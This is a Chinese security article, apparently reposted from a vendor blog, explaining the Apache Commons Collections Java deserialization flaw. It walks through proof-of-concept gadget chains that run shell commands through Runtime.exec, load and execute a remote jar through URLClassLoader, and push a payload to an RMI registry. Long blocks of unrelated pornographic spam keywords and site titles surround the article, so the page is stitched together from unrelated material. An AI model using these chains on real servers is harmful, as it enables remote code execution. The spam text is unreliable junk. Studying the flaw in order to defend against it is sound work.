精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Java反序列化漏洞詳解

安全 漏洞
本文對于Java反序列化的漏洞簡述后,并對于Java反序列化的Poc進行詳細解讀。

[[171784]]

 

Java反序列化漏洞從爆出到現在快2個月了,已有白帽子實現了jenkins,weblogic,jboss等的代碼執行利用工具。本文對于Java反序列化的漏洞簡述后,并對于Java反序列化的Poc進行詳細解讀。

Java反序列化漏洞簡介

  • Java序列化就是把對象轉換成字節流,便于保存在內存、文件、數據庫中,Java中的ObjectOutputStream類的writeObject()方法可以實現序列化。
  • Java反序列化即逆過程,由字節流還原成對象。ObjectInputStream類的readObject()方法用于反序列化。

因此要利用Java反序列化漏洞,需要在進行反序列化的地方傳入攻擊者的序列化代碼。能符合以上條件的地方即存在漏洞。

Java反序列化Poc詳解

  1. public class test { 
  2.     public static void main(String[] args) throws Exception { 
  3.     String[] execArgs = new String[] { "sh", "-c", "whoami > /tmp/fuck" }; 
  4.     Transformer[] transformers = new Transformer[] { 
  5.         new ConstantTransformer(Runtime.class), 
  6.         new InvokerTransformer( 
  7.             "getMethod",  
  8.             new Class[] {String.class, Class[].class },  
  9.             new Object[] {"getRuntime", new Class[0] } 
  10.         ), 
  11.         new InvokerTransformer( 
  12.             "invoke",  
  13.             new Class[] {Object.class,  
  14.             Object[].class }, new Object[] {null, null } 
  15.         ), 
  16.         new InvokerTransformer( 
  17.             "exec",  
  18.             new Class[] {String[].class },  
  19.             new Object[] { execArgs } 
  20.         ) 
  21.      }; 
  22.     Transformer transformedChain = new ChainedTransformer(transformers); 
  23.   
  24.     Map<String, String> BeforeTransformerMap = new HashMap<String, String>(); 
  25.     BeforeTransformerMap.put("hello", "manning"); 
  26.   
  27.     Map AfterTransformerMap = TransformedMap.decorate(BeforeTransformerMap, null, transformedChain); 
  28.   
  29.     Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); 
  30.   
  31.     Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class); 
  32.     ctor.setAccessible(true); 
  33.     Object instance = ctor.newInstance(Target.class, AfterTransformerMap); 
  34.   
  35.     File f = new File("temp.bin"); 
  36.     ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f)); 
  37.     out.writeObject(instance); 
  38.   

如果想徹底理解上面的poc,需要明白Java中的一些概念。

在Apache commons工具包中有很多jar包(jar包可以理解為python的庫),具體jar包里面含有的內容,如下圖所示。

其中Java反序列化的問題出在org.apache.commons.collections這個庫里面。org.apache.commons.collections提供一個類包來擴展和增加標準的Java的collection框架,也就是說這些擴展也屬于collection的基本概念,只是功能不同罷了。Java中的collection可以理解為一組對象,collection里面的對象稱為collection的對象。具象的collection為set,list,queue等等。換一種理解方式,collection是set,list,queue的抽象,collection中文含義是收集的意思,那么收集的具體方式就可以是set,list,queue了。

在org.apache.commons.collections內提供了一個接口類叫Transformer,這個接口的英文定義為

Defines a functor interface implemented by classes that transform one object into another.

也就是說接口于Transformer的類都具備把一個對象轉化為另一個對象的功能。目前已知接口于Transformer的類,如下如所示。

圖上帶箭頭指示的為Java反序列化漏洞的poc含有的類。

  • ConstantTransformer

          Transformer implementation that returns the same constant each time. (把一個對象轉化為常量,并返回)

  • InvokerTransformer

          Transformer implementation that creates a new object instance by reflection. (通過反射,返回一個對象)

  • ChainedTransformer

          Transformer implementation that chains the specified transformers together. (把一些transformer鏈接到一起,構成一組鏈條,對一個對象依次通過鏈條內的每一個transformer進行           轉換)

有了以上的相關概念,就可以理解最開始的poc了。poc里面,我們一共創建了以下關鍵對象。

  • execArgs

          待執行的命令數組

  • transformers

          一個transformer鏈,包含預設轉化邏輯(各類transformer對象)的轉化數組

  • transformedChain

          ChainedTransformer類對象,傳入transformers數組,可以按照transformers數組的邏輯執行轉化操作

  • BeforeTransformerMap

          Map數據結構,轉換前的Map,Map數據結構內的對象是鍵值對形式,類比于python的dict理解即可

  • AfterTransformerMap

          Map數據結構,轉換后的Map

整個poc的邏輯可以這么理解,構建了BeforeTransformerMap的鍵值對,為其賦值,利用TransformedMap的decorate方法,可以對Map數據結構的key,value進行transforme。

TransformedMap.decorate方法,預期是對Map類的數據結構進行轉化,該方法有三個參數。第一個參數為待轉化的Map對象,第二個參數為Map對象內的key要經過的轉化方法(可為單個方法,也可為鏈,也可為空),第三個參數為Map對象內的value要經過的轉化方法。

TransformedMap.decorate(目標Map, key的轉化對象(單個或者鏈或者null), value的轉化對象(單個或者鏈或者null));

上圖是調試時的轉換變量內容,可以很清楚地看到執行完poc后,已經對Map的value進行了轉換(過了一遍transformer鏈)。

poc中對BeforeTransformerMap的value進行轉換,當BeforeTransformerMap的value執行完一個完整轉換鏈,就完成了命令執行。

在進行反序列化時,我們會調用ObjectInputStream類的readObject()方法。如果被反序列化的類重寫了readObject(),那么該類在進行反序列化時,Java會優先調用重寫的readObject()方法。

結合前述Commons Collections的特性,如果某個可序列化的類重寫了readObject()方法,并且在readObject()中對Map類型的變量進行了鍵值修改操作,并且這個Map變量是可控的,就可以實現我們的攻擊目標了。

因此我們在poc中看見了下行的代碼。

  1. Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); 

這個類完全符合我們的要求,具體解釋可以查看TSRC的文章。

如果要實現一個可控的poc,需要對transformer鏈的構造進行理解。首先來看InvokerTransformer。

  1. InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) 

參數依次為:方法名稱,參數類型,參數對象 我們找其中一個來看下。

  1. new InvokerTransformer( 
  2.     "getMethod",  
  3.     new Class[]  {String.class, Class[].class },  
  4.     new Object[] {"getRuntime", new Class[0] } 
  5. ), 
  6. new InvokerTransformer( 
  7.     "invoke",  
  8.     new Class[] {Object.class, Object[].class },  
  9.     new Object[] {null, null } 
  10. ), 
  11. new InvokerTransformer( 
  12.     "exec",  
  13.     new Class[] {String.class },  
  14.     new Object[] {"gedit"} 

參數類型里面的內容完全對應于參數對象里的內容。

PS:由于Method類的invoke(Object obj,Object args[])方法的定義,所以在反射內寫new Class[] {Object.class, Object[].class }。

所以正常流程如下所示:

  1. ((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec("gedit"); 

基于報錯的反序列化transformer鏈

  1. Transformer[] transformers = new Transformer[] { 
  2. new ConstantTransformer(Java.net.URLClassLoader.class), 
  3. new InvokerTransformer( 
  4.     "getConstructor",  
  5.     new Class[] {Class[].class},  
  6.     new Object[] {new Class[]{Java.net.URL[].class}} 
  7. ), 
  8. new InvokerTransformer( 
  9.     "newInstance",  
  10.     new Class[] {Object[].class},  
  11.     new Object[] { new Object[] { new Java.net.URL[] { new Java.net.URL(url) }}} 
  12. ), 
  13. new InvokerTransformer( 
  14.     "loadClass", 
  15.     new Class[] { String.class },  
  16.     new Object[] { "ErrorBaseExec" } 
  17. ), 
  18. new InvokerTransformer( 
  19.     "getMethod", 
  20.     new Class[]{String.class, Class[].class},  
  21.     new Object[]{"do_exec", new Class[]{String.class}} 
  22. ), 
  23. new InvokerTransformer( 
  24.     "invoke", 
  25.     new Class[]{Object.class, Object[].class},  
  26.     new Object[]{null, new String[]{cmd}} 
  27. };  
  28.   

有了先前的理解,很明了了。先建立一個讀取遠程jar文件的類 URLClassLoader,實例化這個類,傳入要訪問的url,再讀取遠程加載類,接著獲取類方法,然后反射這個方法。

關于RMI利用的相關內容

tang3已經在RMI利用文章講過怎么利用了,這段內容,我只是詳解下給出的poc的原理。

poc部分內容

  1. Transformer transformedChain = new ChainedTransformer(transformers); 
  2.   
  3. Map BeforeTransformerMap = new HashMap(); 
  4. innerMap.put("value", "value"); 
  5. Map AfterTransformerMap = TransformedMap.decorate(BeforeTransformerMap, null, transformedChain); 
  6.   
  7. Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); 
  8. Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class); 
  9. ctor.setAccessible(true); 
  10. Object instance = ctor.newInstance(Target.class, AfterTransformerMap); 
  11.   
  12. InvocationHandler h = (InvocationHandler) instance; 
  13. Remote r = Remote.class.cast(Proxy.newProxyInstance( 
  14.                         Remote.class.getClassLoader(),  
  15.                         new Class[]{Remote.class},  
  16.                         h)); 
  17. try{ 
  18. Registry registry = LocateRegistry.getRegistry(ip, port); 
  19. registry.rebind("", r); // r is remote obj 
  20. catch (Throwable e) { 
  21. e.printStackTrace(); 
  22. }            
  23.   

RMI利用的poc看上去還是很熟悉的,因為到建立instance時,還和之前的內容一致。之后便到了RMI內容獨有的細節,從代碼角度可以看出利用邏輯為:

  • 建立實例對象instance
  • 實例對象instance 轉化為 InvocationHandler類型的句柄h(因為instance是序列化后的內容,所以instance就是一串數據)
  • 把句柄h附載到Remote類實例 r上
  • 向遠程服務器注冊,得到遠程注冊對象 registry
  • 向遠程注冊對象registry注冊 實例r

在Java的RMI中,我們允許向遠程已運行的jvm虛擬環境中綁定(rebind函數,也可以理解為添加)一些實例對象,通過RMI協議傳輸一些序列化好的內容,這樣服務端解析(也就是反序列化)傳過來的數據后,便可把解析后的內容添加到運行環境中。構造remote類型實例r 方法很多,poc中利用動態代理創建remote實例r是方法之一。

因此涉及RMI的代碼也會存在Java反序列化漏洞。

漏洞影響分析

Java反序列化漏洞從爆出到現在快2個月了。最開始的只能命令執行和反彈shell,到后來的有回顯的命令執行,到最終的代碼執行,利用上來是越來越方便(有回顯的命令執行和代碼執行均為利用遠程jar文件的利用形式)。從微博來看,已有白帽子實現了jenkins,weblogic,jboss等的代碼執行利用工具。待最終利用工具公布,此漏洞還會有一個上升趨勢的影響。

資料引用

  • http://blog.chaitin.com/2015-11-11_java_unserialize_rce/
  • http://security.tencent.com/index.php/blog/msg/97
  • http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
  • http://www.infoq.com/cn/articles/cf-java-object-serialization-rmi
  • http://blog.nsfocus.net/learning-guide-java-serialization-de-serialization-vulnerability-remediation/
  • http://blog.nsfocus.net/java-deserialization-vulnerability-overlooked-mass-destruction/
責任編輯:趙寧寧 來源: 綠盟科技博客
相關推薦

2021-10-20 07:18:50

Java 序列化漏洞

2009-08-06 11:16:25

C#序列化和反序列化

2024-09-10 08:28:22

2022-08-06 08:41:18

序列化反序列化Hessian

2018-03-19 10:20:23

Java序列化反序列化

2009-09-09 15:47:27

XML序列化和反序列化

2011-06-01 15:05:02

序列化反序列化

2009-06-14 22:01:27

Java對象序列化反序列化

2009-08-24 17:14:08

C#序列化

2016-01-05 15:10:59

2023-12-13 13:49:52

Python序列化模塊

2011-05-18 15:20:13

XML

2019-08-12 06:41:26

PHP反序列化漏洞

2010-03-19 15:54:21

Java Socket

2011-06-01 14:50:48

2009-08-25 14:24:36

C#序列化和反序列化

2019-11-20 10:07:23

web安全PHP序列化反序列化

2021-11-18 07:39:41

Json 序列化Vue

2012-04-13 10:45:59

XML

2009-09-09 16:10:11

.NET序列化和反序列
點贊
收藏

51CTO技術棧公眾號

最新91在线视频| 日本精品一区二区三区四区的功能| 91亚洲永久免费精品| 久久精品无码人妻| 真实原创一区二区影院| 在线不卡的av| 国产av天堂无码一区二区三区| 黄色的视频在线免费观看| 久久99精品久久久久婷婷| 韩国精品美女www爽爽爽视频| 国产精品国产三级国产专业不 | 欧美日韩久久久一区| 大荫蒂性生交片| 成年人视频在线免费观看| 国产69精品久久99不卡| 国产精品99久久99久久久二8| 中文字幕在线观看成人| 免费短视频成人日韩| 欧美一区二区精品| 熟妇人妻va精品中文字幕 | 成人免费av| 亚洲国产精品久久91精品| 亚洲精品自拍网| 福利影院在线看| 亚洲精品久久嫩草网站秘色| 日本一区二区三区www| 欧美一区二区黄片| 国产剧情一区二区三区| 日韩av大片在线| 国产三级aaa| 自拍偷拍一区| 精品视频在线播放色网色视频| 污免费在线观看| 日本a人精品| 91精品福利在线| 三年中文高清在线观看第6集| 深夜福利免费在线观看| 成人av免费在线| 99在线热播| www黄色网址| 国产乱色国产精品免费视频| 国产日韩av在线| 波多野结衣视频在线观看| 国产精品久久777777毛茸茸| 欧美精品精品精品精品免费| 欧美日韩在线视频免费| 中文字幕日韩一区二区不卡 | 欧美www视频| 天天干天天曰天天操| 国产剧情一区二区在线观看| 欧美美女网站色| √天堂资源在线| 国产精品伦一区二区| 欧美三级欧美成人高清www| 拔插拔插海外华人免费| caoporn视频在线| 午夜成人免费视频| 国产成人无码a区在线观看视频| av日韩国产| 欧美日在线观看| 亚洲一区二区蜜桃| 亚洲精品成a人ⅴ香蕉片| 欧美高清www午色夜在线视频| 色网站在线视频| 1313精品午夜理伦电影| 亚洲国产精品99| 一本色道综合久久欧美日韩精品 | 国产一区二区99| 免费国产自线拍一欧美视频| 日本在线观看天堂男亚洲| 国产在线观看第一页| 美女看a上一区| 亚洲在线一区二区| 天堂av在线免费| 国产农村妇女毛片精品久久麻豆 | 色噜噜日韩精品欧美一区二区| 要久久爱电视剧全集完整观看| 尤物九九久久国产精品的特点| 国产成人精品视频免费| 海角社区69精品视频| 欧美孕妇性xx| 国产一区二区三区中文字幕 | 精品国产无码在线观看| 91偷拍一区二区三区精品| 欧美黑人极品猛少妇色xxxxx| 国产精品视频久久久久久久| 日本中文字幕一区二区有限公司| 一本久道久久久| 色综合久久久久网| 久久久精品麻豆| 国产一区二区三区亚洲综合| 精品毛片乱码1区2区3区| b站大片免费直播| 伊人情人综合网| 日韩69视频在线观看| 国产老妇伦国产熟女老妇视频| 成人毛片视频在线观看| 日韩精品不卡| 电影k8一区二区三区久久| 91福利在线导航| 久久久无码人妻精品无码| 奇米狠狠一区二区三区| 欧美另类暴力丝袜| 亚洲大尺度在线观看| 国产黑丝在线一区二区三区| 色一情一乱一伦一区二区三欧美 | 永久免费的av网站| 美日韩黄色大片| 久久久精品免费| 99精品人妻国产毛片| 国产成人福利片| 天堂资源在线亚洲视频| 岛国av在线网站| 日韩一区二区在线免费观看| 成人午夜福利一区二区| 欧美日本精品| 成人精品久久一区二区三区| 视频三区在线观看| 亚洲一级在线观看| 五月天丁香花婷婷| 欧美久久综合网| 欧美在线亚洲一区| 六月丁香综合网| 一区二区在线观看视频在线观看| 自拍偷拍 国产| 全国精品免费看| 国外色69视频在线观看| 国产草草影院ccyycom| 国产精品麻豆网站| 妞干网在线免费视频| 亚洲人成网www| 91精品国产91| 香蕉视频免费在线看| 亚洲福利一二三区| wwwxxx色| 日本蜜桃在线观看视频| 欧美亚洲在线| 国产一区二区视频在线免费观看| а√天堂在线官网| 91精品国产综合久久久蜜臀图片 | 国产精品久久久久桃色tv| 18岁视频在线观看| 亚洲欧美日本伦理| 欧美一级片在线播放| 五月婷婷丁香六月| 精品久久久中文| 粉嫩av懂色av蜜臀av分享| 亚洲麻豆一区| 麻豆av一区二区三区| 在线观看的黄色| 国产视频久久网| 国产伦精品一区二区三区视频我| 91麻豆视频网站| 国产女女做受ⅹxx高潮| 伊人久久大香线蕉| 国产精品夫妻激情| 成年网站在线| 91精品国产91热久久久做人人 | 国产在线观看高清视频| 91成人国产精品| 色噜噜噜噜噜噜| 国产综合一区二区| 久久亚洲国产成人精品无码区| 亚洲五码在线| 91av国产在线| 成年人在线观看网站| 欧美狂野另类xxxxoooo| 欧美日韩精品亚洲精品| 不卡的av电影| 欧美日韩大尺度| 97精品视频| 成人免费91在线看| 欧美magnet| 色av中文字幕一区| 成人高潮片免费视频| 欧美日韩性视频| www成人啪啪18软件| 国产精品夜夜嗨| 黄色片视频在线免费观看| 波多野结衣在线播放一区| 成人久久精品视频| 国产夫妻在线播放| 色偷偷噜噜噜亚洲男人| 亚洲精品第五页| 色呦呦网站一区| 国产成人久久久久| 91亚洲精品一区二区乱码| 艹b视频在线观看| 一区精品久久| 99国产精品久久久久久久| 亚洲一区二区三区777| 不卡的av影片| 日韩在线视频一区| 亚洲av电影一区| 欧美精品久久一区二区三区| 国产精品6666| 亚洲日本青草视频在线怡红院| 欧美肉大捧一进一出免费视频 | 亚洲熟妇一区二区| 首页亚洲欧美制服丝腿| 精品久久久无码人妻字幂| 久久99国产精品视频| 成人免费看吃奶视频网站| a级片在线免费观看| www.久久色.com| 欧美偷拍视频| 日韩欧美成人激情| 日本欧美www| 欧美性20hd另类| 久久久久久久久久久网| 国产精品久久久久婷婷二区次| 色综合久久五月| 欧美88888| 国产a久久麻豆| 国产又大又黄又粗的视频| 欧美久久99| 亚洲人久久久| 综合伊思人在钱三区| 粉嫩高清一区二区三区精品视频| 久久久成人av毛片免费观看| 久久久久久久久久久免费精品| 三区四区在线视频| 亚洲欧美中文日韩在线v日本| 亚洲风情第一页| 911精品国产一区二区在线| av首页在线观看| 精品久久久精品| 久久精品99国产精| 亚洲精品免费电影| 日本高清不卡免费| 国产精品乱子久久久久| 永久免费av无码网站性色av| 91丨porny丨户外露出| 妖精视频一区二区| 国产馆精品极品| 一个人看的视频www| 精品写真视频在线观看| 亚洲无吗一区二区三区| 久久资源在线| 日韩有码免费视频| 久久久久.com| 白嫩少妇丰满一区二区| 美女精品在线| 黄色三级视频片| 日本欧美一区二区三区乱码| 最近免费中文字幕视频2019| 午夜免费精品视频| 国产综合精品一区| 久久99久久99精品| 亚洲黄页一区| 浮妇高潮喷白浆视频| 一区二区三区国产在线| 亚洲自偷自拍熟女另类| 在线亚洲一区| 国产精品入口免费软件| 久久精品国产77777蜜臀| 羞羞的视频在线| 国产伦精品一区二区三区视频青涩| 色网站在线视频| 顶级嫩模精品视频在线看| www.88av| 国产人妖乱国产精品人妖| 欧美成人久久久免费播放| 亚洲人成小说网站色在线| 日韩在线观看视频一区二区| 亚洲一区在线电影| 天堂在线免费观看视频| 欧洲日韩一区二区三区| 91无套直看片红桃| 日韩欧美一级二级三级久久久| 午夜精品久久久久久久99| 亚洲黄在线观看| www.国产精品.com| 久久久97精品| 波多野结衣在线观看| 欧美一区视频在线| 亚洲精品无播放器在线播放| 成人片在线免费看| 亚洲精品国产setv| 中文字幕一区综合| 99国产一区| 手机av在线网| 99久久精品一区二区| 黄大色黄女片18免费| 一区二区在线观看免费视频播放| 亚洲欧美在线视频免费| 欧美在线观看你懂的| 亚洲成人久久精品| 亚洲人永久免费| 午夜影院免费在线| 日本久久久久久久久| 国产一区二区三区免费在线| 欧美大香线蕉线伊人久久| 五月久久久综合一区二区小说| 国产精品国产亚洲精品看不卡| 日本视频免费一区| 亚洲天堂美女视频| 亚洲手机成人高清视频| www.久久久久久久| 精品日产卡一卡二卡麻豆| 春暖花开成人亚洲区| 久久久久久久激情视频| 黑人一区二区三区| 免费一区二区三区| 欧美三级乱码| 天天干天天av| 国产日本欧洲亚洲| 九九热在线免费观看| 日韩欧美中文字幕制服| 国产一级二级三级在线观看| 欧美极品美女视频网站在线观看免费| 师生出轨h灌满了1v1| 六月婷婷一区| 最新国产精品自拍| 国产精品久久久久影院老司| 亚洲s码欧洲m码国产av| 精品国产制服丝袜高跟| 免费黄色网址在线观看| 日本成熟性欧美| 激情视频极品美女日韩| 喜爱夜蒲2在线| 久久99久久久久| 男人的天堂官网| 色偷偷久久人人79超碰人人澡| 可以免费观看的毛片| 免费不卡欧美自拍视频| 农村妇女一区二区| 日本精品一区二区三区高清 久久| 亚洲精品男同| 91九色蝌蚪porny| 一区二区三区国产豹纹内裤在线| 亚洲中文字幕一区二区| 国产一区二区三区中文 | 久9久9色综合| 久久网站免费视频| 91蜜桃网址入口| 中文字幕免费在线观看视频| 亚洲国产成人一区| 女人高潮被爽到呻吟在线观看| 国产欧美在线一区二区| 国产精品99免费看| 国产51自产区| 亚洲成av人片一区二区梦乃| 天天干在线观看| 97婷婷涩涩精品一区| 日韩欧美ww| 久久久久久久久久久久久国产精品 | 亚洲乱妇老熟女爽到高潮的片| 亚洲精品大片www| 性做久久久久久久| 久久久久久com| 另类尿喷潮videofree| 黄色免费视频大全| 久久综合狠狠综合久久激情 | 欧美日韩亚洲免费| 久久九九99| 国产精品久久国产精麻豆96堂| 欧美日韩在线电影| 国产视频在线播放| 国产精品av一区| 西西裸体人体做爰大胆久久久| 草草地址线路①屁屁影院成人| 日韩欧美999| 亚洲图片88| 亚洲在线视频观看| 亚洲免费激情| 国产精品毛片一区二区| 欧美日韩午夜在线视频| 中文字幕在线播放网址| 精品999在线观看| 日本成人超碰在线观看| 麻豆视频在线免费看| 亚洲第一页中文字幕| 日韩电影av| 天天做天天爱天天高潮| 涩涩网在线视频| 国产高清在线不卡| 日韩欧美国产精品综合嫩v| 麻豆精品国产传媒| 欧美日韩精品中文字幕| 在线播放日本| 国产呦系列欧美呦日韩呦| 日韩成人一区二区三区在线观看| 日本一级片免费| 国产视频丨精品|在线观看| 日韩色性视频| 日韩欧美一区三区| 亚洲欧洲另类国产综合| 日本黄色免费视频| 国产一区视频在线| 亚洲精品麻豆| 日韩一级片大全| 亚洲人成五月天| 成人av激情人伦小说| 另类小说第一页| 亚洲国产成人av网| 嫩草在线视频| 欧美国产综合视频| 国产成人福利片| 在线免费看91|